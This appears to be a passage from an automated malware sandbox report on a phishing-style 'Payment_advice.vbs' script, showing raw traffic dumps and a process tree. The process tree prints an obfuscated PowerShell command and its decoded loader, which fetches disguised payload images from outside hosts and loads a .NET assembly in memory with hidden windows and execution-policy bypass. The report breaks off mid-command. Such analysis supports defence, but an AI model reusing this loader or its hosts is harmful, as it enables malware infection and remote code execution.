2024-02-14 08:08:17 UTC	1369	IN	Data Raw: af 41 4c c8 c8 f4 f4 ad 1b ab fb 29 b4 2b 2b 28 f4 c4 86 fa 19 64 79 b5 01 21 2d 70 ad ca a1 5e 83 6f 62 09 f7 15 9d cf a1 fc 7a d6 62 71 ec 26 05 06 3e 33 83 4e 0a 4f 63 52 2a 67 b5 26 c5 62 df 87 f5 eb ff 00 0b df b5 ee 9b 2a c3 72 d1 34 05 99 43 fc 8c 06 ec 02 31 9e 01 cf b5 66 95 2d b9 9d 89 76 c9 24 e4 e4 9e 4f 3f 8f 5a 98 a6 3d 40 f6 a8 8f b7 34 79 96 97 46 47 b7 04 f6 1f af 7c 51 c5 38 02 73 9e 0d 33 69 ce 33 c7 bd 03 4a c3 1b 07 38 38 a6 b4 65 71 90 09 eb ef 53 2e 41 0c 40 38 e6 96 66 32 be ec 63 da 8b 85 ae 56 da 73 e9 df 14 85 3b e2 a4 27 9a 4a 41 62 17 18 14 8a bb fb e3 eb 52 95 19 f6 a8 dd 70 38 eb 4c 08 c8 db df 34 94 1c e7 9a 2a 86 26 71 d3 ad 0c c7 6e 33 c1 e4 d2 d0 29 58 07 da dd 4f 63 3a 4f 6d 2c 90 4c 87 2b 24 67 0c 38 ec 7a f2 0e 0d 46 Data Ascii: AL)++(dy!-p^obzbq&>3NOcRg&br4C1f-v$O?Z=@4yFG\|Q8s3i3J88eqS.A@8f2cVs;'JAbRp8L4*&qn3)XOc:Om,L+$g8zF
2024-02-14 08:08:17 UTC	1369	IN	Data Raw: 3b 1f a5 28 e3 de 9d c5 b0 9b 28 03 14 b4 a1 4b 90 14 12 49 c0 c7 52 69 a7 70 dc 55 23 6d 31 7a e3 34 e9 a0 92 dd ca c8 85 18 73 82 30 79 e9 4c 0b 43 18 f3 c1 f5 a4 a0 f5 a2 a4 41 49 b7 18 a5 a2 90 00 ef f9 51 49 d0 9f 7e 69 73 52 02 30 c8 3e bd 7f 2a 61 07 07 db fc e6 9e 58 7a fb 53 c2 c4 62 72 ce 44 a3 01 40 03 1f 42 73 4d 30 20 28 47 b5 30 8c 75 a9 58 9c 8e 73 4d 35 77 1a d4 4c 71 48 46 29 d4 52 34 1b f8 52 53 99 71 4d a0 06 49 c7 6c 8a 68 19 20 74 cd 48 c3 22 a3 c6 08 3d e9 dc 63 a4 8d a3 23 3d f0 7f 0a 6d 39 9c be 37 12 69 b4 30 b0 51 45 15 24 b4 27 bd 2f 07 a5 14 54 8a c0 e0 29 c0 39 03 bf 6f 53 52 4b 6f 24 0b 13 49 1b 22 ca bb a3 66 e0 32 e7 a8 a8 f1 c8 ed fa d3 9e 59 24 08 1d d9 c2 0d aa 09 c8 51 9c f0 3b 50 2d 86 d0 14 91 9c 71 eb 45 00 9c 11 9e Data Ascii: ;((KIRipU#m1z4s0yLCAIQI~isR0>*aXzSbrD@BsM0 (G0uXsM5wLqHF)R4RSqMIlh tH"=c#=m97i0QE$'/T)9oSRKo$I"f2Y$Q;P-qE
2024-02-14 08:08:17 UTC	1369	IN	Data Raw: 07 83 9a 69 42 39 e2 9d c7 74 26 78 f5 3e d4 84 60 f2 30 7d e9 41 28 41 07 04 50 cc 5c 92 4e 4f 73 4c 76 13 1c 83 e9 4b d6 8e b4 01 9a 4c 96 14 51 40 19 a9 00 a5 e8 69 08 c5 28 c7 7a 00 3a 9f 53 fa d2 93 c7 4a 6d 14 00 53 4f 26 9e 46 06 73 51 f7 eb c5 3b 00 ee bc 54 67 8c f7 a9 8a 32 a0 62 08 0d 9c 66 a3 23 26 90 d0 32 6c 08 72 09 3d 87 6f ad 34 1c 0e 94 b8 c7 7a 36 d0 31 68 a5 03 34 63 9a 00 4c d2 e3 8f 7a 30 70 69 3f 43 eb 40 0a 41 53 cf 06 92 9d 92 ed c9 c9 e0 52 50 02 52 d2 51 40 0a 4e 4d 25 14 50 01 4b d8 d1 8c f6 cd 27 f5 a0 03 a7 b5 3c c8 cd 08 43 ca 83 9c fb 9e c4 d3 29 db c8 52 a0 e0 1e 71 40 00 20 0c 52 d2 75 1d 29 b4 0a c4 d0 95 66 e7 81 44 98 0e 76 fd d3 fa 54 43 fc e2 94 37 18 ed 4b 51 13 5a dd 4b 65 73 15 c4 0e 63 9e 26 0e 92 0e a0 8e 46 3e Data Ascii: iB9t&x>`0}A(AP\NOsLvKLQ@i(z:SJmSO&FsQ;Tg2bf#&2lr=o4z61h4cLz0pi?C@ASRPRQ@NM%PK'<C)Rq@ Ru)fDvTC7KQZKesc&F>
2024-02-14 08:08:17 UTC	1369	IN	Data Raw: 3e 80 73 51 bf bd 4a 07 3e 94 d3 1e 73 e9 59 f2 95 cd a6 84 06 20 dd f8 ab 1a 7d c5 ad a3 ce 6e 6c c5 e0 78 99 50 16 c6 c7 ec c3 e9 e9 4c fb a6 a2 6e fc 71 52 e3 7d 0a 8c fb 95 59 0a e3 27 24 67 9f 6c f4 fc 29 09 dc 0f 3c 54 ae be b5 11 e3 e9 43 89 5c c4 64 1c 54 4c 4e 7d fd aa 7e 49 03 af f2 a6 32 64 e4 71 df 1d 0d 67 cb 62 ae 44 ec 64 cb 1e 4f 1f 87 61 51 b8 c9 03 03 03 8c fa fe 95 af a2 59 e9 57 97 12 c7 ab de cf 61 07 94 4c 72 43 0f 9b 96 03 20 11 91 d4 f7 1f 8d 64 90 4e 33 d4 fb e6 96 fa 58 3a 27 71 98 23 34 d6 e7 f0 a9 48 e6 98 47 07 d6 97 2d f5 05 2b 11 18 9b 1b f1 f2 8e fd b9 f4 a7 45 75 3d ba 4f 1c 52 c9 1c 73 28 49 55 18 81 20 c8 60 08 cf 62 a0 e3 da 9c 77 79 7b 4b 1c 75 c7 6a 41 19 72 06 ec 13 c6 71 ef 59 b5 dc d6 32 b1 58 a8 07 39 cf e1 8a 42 Data Ascii: >sQJ>sY }nlxPLnqR}Y'$gl)<TC\dTLN}~I2dqgbDdOaQYWaLrC dN3X:'q#4HG-+Eu=ORs(IU `bwy{KujArqY2X9B
2024-02-14 08:08:17 UTC	1369	IN	Data Raw: e2 c9 ad 82 96 c7 23 3c 1c d4 15 af 69 e1 8d 6f 55 d1 ef 35 5b 4d 26 fe ef 4a b1 4d d7 37 b1 5b bb c3 00 c8 19 77 00 85 e4 81 92 47 5a c7 62 01 3d ea 53 12 ba dd 06 05 35 93 34 b9 34 31 20 0a 63 63 0e 7b d2 1c f6 a7 9e 94 d2 31 c8 e6 82 2c 46 d4 da 71 5e 49 f5 a6 d3 6a c6 97 10 8a 6e 39 cd 3e 82 b9 e9 52 2d 44 dd d3 d2 95 79 e4 f4 a3 67 bd 38 2f 1c 9a 42 b7 50 18 26 9b 9c 11 e9 4f a4 20 1f ad 22 6e 35 fd 47 43 4d a9 31 81 eb 4d c0 eb de 90 c6 91 8a 5c f1 47 5f 6a 4a 56 13 0f c6 91 85 2d 07 9a a1 0c a4 e0 1a 7e 38 a4 29 4c 62 66 93 22 8c 60 1a 6d 21 8a 06 69 d4 8b 8c d3 8f 26 9d ae 26 46 c4 12 2a 32 31 f4 a7 9e a6 9a 46 69 1a 21 b4 e1 d2 9b d2 95 68 b0 c5 c0 a5 a2 8a 57 10 51 40 19 a3 06 98 08 46 45 20 e2 9d 4d 2a 73 c0 e2 93 57 01 43 98 f0 ca 79 f5 a1 55 Data Ascii: #<ioU5[M&JM7[wGZb=S5441 cc{1,Fq^Ijn9>R-Dyg8/BP&O "n5GCM1M\G_jJV-~8)Lbf"`m!i&&F21Fi!hWQ@FE MsWCyU
2024-02-14 08:08:17 UTC	1369	IN	Data Raw: c2 fd 92 27 81 36 81 89 98 31 c8 03 27 38 ef 83 8a 87 38 5e 9f 37 ad 0c 41 01 71 83 eb 48 03 94 f9 7e f2 83 9c 76 34 ce 9e e7 d4 f7 a7 e4 91 d3 81 4d e4 9a 00 50 c7 69 18 07 3c d2 d3 48 c1 e9 8a 4a 60 14 ac 39 f5 1d 69 2a 7b 79 a1 88 c8 66 b7 17 20 a1 55 05 b6 ed 3d 01 e9 ce 3d 0d 20 2b 36 01 3f 97 f2 e2 95 d3 68 1c 83 9e 78 39 e2 93 90 3a e4 f4 e4 63 38 f6 f7 a3 df 02 a8 61 8c 9c 01 9f c2 97 1c fa 52 2b 94 60 c0 e0 8a 7c 8a 11 b3 bb 70 6e 4f b1 a0 69 dc 65 25 1d 68 eb 42 10 30 c0 fc 85 03 a5 48 11 1a 12 de 61 12 e7 01 70 70 47 ae 7a 54 63 8a 05 b1 25 b4 6f 34 f1 c2 9b 43 cc c1 01 73 b4 02 4f 73 d0 63 b9 35 36 a7 a7 be 8f a9 5e d8 5c 98 e5 9e da 47 81 9e 07 de 85 83 60 95 6e 84 1c 13 91 55 18 02 08 c6 41 1d 3b 7b f6 a4 c7 40 09 03 d4 ff 00 85 48 05 2b a1 Data Ascii: '61'88^7AqH~v4MPi<HJ`9i*{yf U== +6?hx9:c8aR+`\|pnOie%hB0HappGzTc%o4CsOsc56^\G`nUA;{@H+
2024-02-14 08:08:17 UTC	1369	IN	Data Raw: 2a 68 7f 51 4a c0 39 18 18 1e f5 4b 70 6a e2 83 8e e3 f3 a0 b0 ff 00 eb f6 a6 10 00 a9 9e 55 78 76 84 e0 7a 7f 5a 2c 2b 11 b8 ef 8c 7d 69 94 a4 9e 99 cd 25 0b 41 86 06 d3 eb 4a 47 71 d2 92 81 9e 79 a6 0d d8 fd 3f 27 23 af e5 4d dc 3d 79 a6 ee da 28 c8 3c 7f 5a fd 54 fc c0 52 41 3f d6 9a cd cf 14 3f 4c 0e 95 19 c8 a0 64 aa c0 8a 1a a2 59 01 c0 e9 cd 38 9c 9a 96 52 06 27 a7 43 51 96 39 f4 a7 13 c6 3b fa d4 79 e7 d4 fb 55 14 3b 27 14 9d 4d 29 6a 6e 7a d4 dc 60 cd 9e 07 d2 9b 4a 48 22 9a 4e de b4 ee c6 0c 7d e9 9b cd 0e db 87 14 d3 c7 d6 8d f5 01 c5 89 a6 e7 9a 32 7f 1a 6e 69 8f 71 dd 7b 67 14 d2 c0 03 c7 b5 21 6e 7a f2 69 a4 d4 ee 3b 0a c4 1c 71 82 3b d3 77 0a 4d d4 83 19 eb 4f 41 b1 c5 f0 38 18 3e f4 dd f9 ed f9 50 dc 03 de 9b cf a5 48 58 7b 30 e3 1d 69 84 Data Ascii: *hQJ9KpjUxvzZ,+}i%AJGqy?'#M=y(<ZTRA??LdY8R'CQ9;yU;'M)jnz`JH"N}2niq{g!nzi;q;wMOA8>PHX{0i
2024-02-14 08:08:17 UTC	1369	IN	Data Raw: 38 50 11 76 2e 06 38 ee 4f b9 a0 f0 7a 53 1c 77 eb 4a dd 4d 2e 44 45 37 6e 78 03 27 ad 48 41 27 a8 a3 26 3c 15 1c ff 00 3a 42 4c 8c 85 f2 0e 50 97 27 86 e4 0a 60 1c 9f 41 fe 7f 4a b9 2d f1 96 d1 61 28 06 09 39 ee 6a a0 3c 1f cf e9 48 ad c4 00 b6 00 19 3d 3d 73 48 c4 90 46 30 7a 54 d6 f2 08 5c 31 19 e7 38 fc 29 92 c9 e6 39 38 c6 79 fe 75 22 5b 11 03 8a 61 39 3c 8c 0a 97 23 69 f5 a8 c8 a2 d7 1a 18 c3 06 92 94 f2 71 e9 49 cf a5 05 ad 03 3d e8 0d ef ed ed 9f 4c d3 a0 88 4d 3c 51 17 58 83 ba ae f7 e0 2e 4f 24 9f 41 9e 6a e6 bb a5 26 8b a9 cb 69 1d fd b6 a4 88 01 fb 4d 99 cc 6d 91 c8 07 db a1 c5 4f 5b 15 7d 2e 55 56 07 d0 1a 31 92 73 f4 a8 b1 f9 55 80 50 5b 9e 3e 7c e6 80 4f b9 1e de 69 ac 36 d2 6e 3b a8 63 91 4a c3 43 93 c9 00 6e 2c 5b 18 f6 14 d6 c7 f0 d3 29 Data Ascii: 8Pv.8OzSwJM.DE7nx'HA'&<:BLP'`AJ-a(9j<H==sHF0zT\18)98yu"[a9<#iqI=LM<QX.O$Aj&iMmO[}.UV1sUP[>\|Oi6n;cJCn,[)

Target ID:	0
Start time:	09:07:50
Start date:	14/02/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_advice.vbs"
Imagebase:	0x7ff703180000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	09:07:52
Start date:	14/02/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreGEDgTreMwBhDgTreDDgTreDgTreYQDgTrexDgTreGMDgTreMwDgTreyDgTreDEDgTreNwDgTre4DgTreC0DgTreOQDgTrewDgTreDEDgTreYQDgTretDgTreDYDgTreMQDgTrexDgTreDQDgTreLQDgTrewDgTreDQDgTreNwDgTrezDgTreC0DgTreNDgTreDgTre4DgTreDkDgTreMgDgTre3DgTreDEDgTreMwBlDgTreD0DgTrebgBlDgTreGsDgTrebwB0DgTreCYDgTreYQBpDgTreGQDgTreZQBtDgTreD0DgTredDgTreBsDgTreGEDgTrePwB0DgTreHgDgTredDgTreDgTreuDgTreDQDgTreMDgTreDgTreyDgTreDDgTreDgTreMwDgTrexDgTreG0DgTrecgBvDgTreHcDgTreeDgTreBuDgTreGgDgTrebwBqDgTreC8DgTrebwDgTrevDgTreG0DgTrebwBjDgTreC4DgTredDgTreBvDgTreHDgTreDgTrecwBwDgTreHDgTreDgTreYQDgTreuDgTreDYDgTreNDgTreDgTrewDgTreDMDgTreODgTreDgTretDgTreG0DgTreZQB0DgTreHMDgTreeQBzDgTreC0DgTreZQBjDgTreGkDgTrebwB2DgTreG4DgTreaQDgTrevDgTreGIDgTreLwDgTrewDgTreHYDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTreaQBwDgTreGEDgTreZQBsDgTreGcDgTrebwBvDgTreGcDgTreLgBlDgTreGcDgTreYQByDgTreG8DgTredDgTreBzDgTreGUDgTrecwBhDgTreGIDgTreZQByDgTreGkDgTreZgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBODgTreGEDgTrebQBlDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	09:07:52
Start date:	14/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	09:07:53
Start date:	14/02/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = 